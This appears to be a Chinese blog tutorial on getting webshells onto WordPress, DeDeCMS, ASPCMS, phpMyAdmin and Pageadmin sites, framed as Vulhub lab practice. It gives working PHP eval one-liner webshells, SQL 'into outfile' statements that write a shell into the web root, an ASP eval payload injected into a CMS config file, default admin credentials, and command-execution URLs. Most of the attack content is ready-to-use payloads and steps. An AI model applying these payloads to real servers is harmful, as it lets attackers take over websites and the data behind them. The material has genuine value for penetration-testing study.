常见CMS

一、WordPress

后台修改模板拿WebShell

进入Vulhub靶场并执行以下命令开启靶场。端口是8080。

复制代码
cd vulhub-master/wordpress/pwnscriptum
docker-compose up -d
复制代码
http://47.93.51.60:8080/wp-content/themes/twentyfifteen/404.php?cmd=phpinfo();

上传主题拿WebShell

去找一个主题下载好之后跟一个php文件(里面写的一句话木马)放一起之后压缩上传。

拼接下面的路径就访问到了

复制代码
http://47.93.51.60:8080/wp-content/themes/主题名/php文件名

二、DeDeCMS

通过文件管理器上传WebShell

上传我们的一句话木马文件即可。

复制代码
http://172.16.2.4/uploads/1.php

修改模板文件拿WebShell

写入一句话木马。

复制代码
http://172.16.2.4/index.php?cmd=phpinfo();

后台任意命令执行拿WebShell

在广告内容写入一句话木马。

拼接路径访问即可。

通过后台sql命令执行拿webshell

获取mysql路径,由此猜测网站绝对路径

复制代码
select '<?php @eval($_GET[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'

三、ASPCMS

后台修改配置文件拿Shell

这里有权限问题就改wwwroot文件的权限。

进入后台,账号:admin,密码:123456

复制代码
http://172.16.2.4/admin_aspcms/index.asp     //全新版本

开代理去抓包。

复制代码
%25><%25Eval(Request (chr(65)))%25><%25   //密码是a

访问下面的地址用工具连接即可。

复制代码
http://172.16.2.4/config/aspcms_config.asp

四、PhPMyadmin

通过日志文件拿Shell

利用mysql日志文件写shell.这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以改这个存放位置,并且可以修改它的后缀名,所以可以修改成php的后缀名就能获取⼀个webshell

导⼊导出拿WebShell

首先判断mysql位置

复制代码
select "<?php @eval($_GET[a]);?>" into outfile 'D:/phpstudy_pro/WWW/2.php'

http://127.0.0.1/1.php?a=phpinfo();

五、Pageadmin

上传文件解压拿WebShell

上传一个压缩包,里面是1.asp,然后解压后,1.asp就在文件管理里面了。然后用工具去连。

相关推荐
txinyu的博客3 分钟前
解析muduo源码之 TcpConnection.h & TcpConnection.cc
网络
小义_18 分钟前
随笔 1(Linux)
linux·运维·服务器·网络·云原生·红帽
进击的雷神25 分钟前
主办方过滤、展位号模糊提取、多层级官网爬取、缅文编码解码——缅甸塑料展爬虫四大技术难关攻克纪实
网络·爬虫·python
上海云盾-小余27 分钟前
CC 攻击与 DDoS 联动防护:如何构建一体化流量清洗架构
网络·安全·游戏·架构·ddos
向往着的青绿色30 分钟前
雷池(SafeLine)社区版免费部署教程|从环境检查到防护实操全流程
网络·计算机网络·nginx·网络安全·容器·网络攻击模型·信息与通信
Larry_Yanan31 分钟前
Qt网络开发之基于 QWebEngine 实现简易内嵌浏览器
linux·开发语言·网络·c++·笔记·qt·学习
恒星科通33 分钟前
旅游景区大功率高清晰应急疏散广播技术方案
安全·旅游·广播·应急广播
思慕很大很大44 分钟前
Web安全:从“来源校验”到“CSRF Token”的演进
安全·浏览器
波兰的蓝1 小时前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
AI+程序员在路上1 小时前
CAN 总线与 Linux SocketCAN C 语言测试程序
linux·c语言·网络